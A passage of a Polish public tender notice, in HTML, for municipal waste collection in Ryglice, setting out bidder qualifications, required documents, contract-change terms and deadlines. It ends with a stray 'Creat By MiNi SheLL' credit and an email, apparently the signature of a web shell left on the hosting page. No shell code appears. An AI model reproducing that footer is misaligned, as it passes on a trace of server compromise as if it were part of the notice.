A.aktualnego wpisu do rejestru działalności regulowanej w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości prowadzonego przez Burmistrza Gminy Ryglice (w przypadku wspólnego ubiegania się o udzielenie zamówienia przez dwóch lub więcej Wykonawców w ofercie muszą być złożone przedmiotowe dokumenty dla każdego z nich),
B.aktualnego zezwolenie na transport odpadów obejmującego Gminę Ryglice wydanego na podstawie ustawy z dnia 27 kwietnia 2001 r. o odpadach w zakresie odpadów objętych przedmiotem zamówienia lub zezwolenie na odzysk i unieszkodliwianie odpadów we wskazanym zakresie i  na podstawie art. 32 ustawy z dnia 27 kwietnia 2001 r. jest zwolniony z obowiązku uzyskania zezwolenia na transport, albo zezwolenie na zbieranie lub zbieranie i przetwarzanie odpadów wydane na podstawie art. 41 ustawy z dnia 14 grudnia 2012 r. o odpadach (Dz. U. z 2013 r., poz.21).
Zamawiający dokona oceny spełniania przez Wykonawców wymaganych warunków udziału w postępowaniu zgodnie ze wzorem spełnia lub nie spełnia na podstawie złożonych w ofercie oświadczeń i dokumentów</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca spełnia warunek posiadania wiedzy i doświadczenia zapewniającego wykonanie zamówienia, jeżeli Wykonawca wykaże wykonanie, a w przypadku świadczeń okresowych lub ciągłych również wykonywanie, głównych usług  w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy, polegające na odbiorze odpadów komunalnych segregowanych i niesegregowanych o łącznej masie 1 000 Mg, w sposób ciągły przez okres minimum 12 miesięcy.

Zamawiający uzna za dokument potwierdzający należyte wykonanie usługi m. in. dokumenty potwierdzające odbiór odpadów komunalnych np. sprawozdanie M-09 o wywozie i  unieszkodliwianiu odpadów, sprawozdanie G-06 potwierdzające obrót surowcami wtórnymi.
Zamawiający dokona oceny spełniania przez Wykonawców wymaganych warunków udziału w postępowaniu zgodnie ze wzorem spełnia lub nie spełnia na podstawie złożonych w ofercie oświadczeń i dokumentów</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku. Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku. Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca spełnia warunek znajdowania się w sytuacji ekonomicznej     i finansowej zapewniającej wykonanie zamówienia, jeśli Wykonawca wykaże, iż jest ubezpieczony od odpowiedzialności cywilnej w zakresie działalności związanej z przedmiotem zamówienia na kwotę, co najmniej 300 000,00 zł (słownie: trzysta tysięcy złotych).
Zamawiający dokona oceny spełniania przez Wykonawców wymaganych warunków udziału w postępowaniu zgodnie ze wzorem spełnia lub nie spełnia na podstawie złożonych w ofercie oświadczeń i dokumentów</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)formularz oferty - zgodnie z załącznikiem nr 1 do SIWZ,2) jeżeli uprawnienie do reprezentacji osoby podpisującej ofertę nie wynika z załączonych do oferty dokumentów, do oferty należy dołączyć pełnomocnictwo lub dokument, z którego będzie wynikać uprawnienie do podpisywania oferty,3)pełnomocnictwo do reprezentowania wykonawcy, o ile ofertę składa pełnomocnik,4)dowód wniesienia wadium</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Zamawiający wymaga, aby Wykonawca zawarł z nim umowę na warunkach określonych we wzorze umowy, zgodnie z Załącznikiem Nr 6 do SIWZ.
2.Zmiana postanowień Umowy w stosunku do treści oferty Wykonawcy   w zakresie wynagrodzenia  dopuszczalna jest w przypadku:
1)zmiany stawek opłat za przyjęcie odpadów w Regionalnej Instalacji do Przetwarzania Odpadów Komunalnych;
2)zmiany wysokości innych opłat wynikających wprost z przepisów prawa a mających istotny wpływ na koszty świadczenia usługi;
3)innej zmiany prawa powszechnie obowiązującego wpływającej na zasady odbierania   i zagospodarowania odpadów;
4)odstąpienia na wniosek Zamawiającego od realizacji części zamówienia i związanej z tym zmiany wynagrodzenia, pod warunkiem wystąpienia obiektywnych okoliczności, których Zamawiający nie mógł przewidzieć na etapie przygotowania postępowania, a które powodują, że wykonanie przedmiotu zamówienia bez ograniczenia zakresu zamówienia, powodowałoby dla Zamawiającego niekorzystne skutki z uwagi na zamierzony cel realizacji przedmiotu zamówienia   i związane z tym racjonalne wydatkowanie środków publicznych,
5)wprowadzenia zmian w stosunku do Opisu Przedmiotu Zamówienia w zakresie wykonania prac nie wykraczających poza zakres przedmiotu zamówienia, w sytuacji konieczności zwiększenia usprawnienia procesu realizacji zamówienia,
6)zmiany wysokości stawki podatku VAT za świadczenie usług wynagrodzenie brutto ulega zmniejszeniu tak, aby dotychczasowe wynagrodzenie netto należne Wykonawcy nie uległo zmianie.
3.W związku z wskazanymi w ust. 2 okolicznościami dopuszczalne jest zmniejszenie lub
zwiększenie wynagrodzenia, przy czym zwiększenie wynagrodzenia dopuszczalne jest
o kwotę nie większą niż udokumentowany wzrost kosztów świadczenia usług.
4.Dopuszcza się zmianę umowy w zakresie sposobu spełniania przez Wykonawcę świadczenia odbierania i zagospodarowania odpadów w przypadku zmiany przepisów prawa powszechnie obowiązującego wpływających na sposób spełnienia świadczenia. 
5.Wszelkie zmiany do  umowy wymagają pod rygorem nieważności formy pisemnej
6.W trakcie trwania umowy Wykonawca zobowiązuje się do pisemnego powiadamiania Zamawiającego o:
1)zmianie siedziby lub nazwy firmy,
2)zmianie osób reprezentujących,
3)ogłoszeniu upadłości
4)ogłoszeniu likwidacji,
5)zawieszenia działalności,
6)wszczęcia postępowania układowego, w którym uczestniczy Wykonawca.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.ryglice.pl/bip<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Ryglicach, 33-160 Ryglice, ul. Rynek 9, pok. 17.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.05.2013 godzina 09:30, miejsce: Urząd Miejski w Ryglicach, 33-160 Ryglice, ul. Rynek 9, Sekretariat pok. 4.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com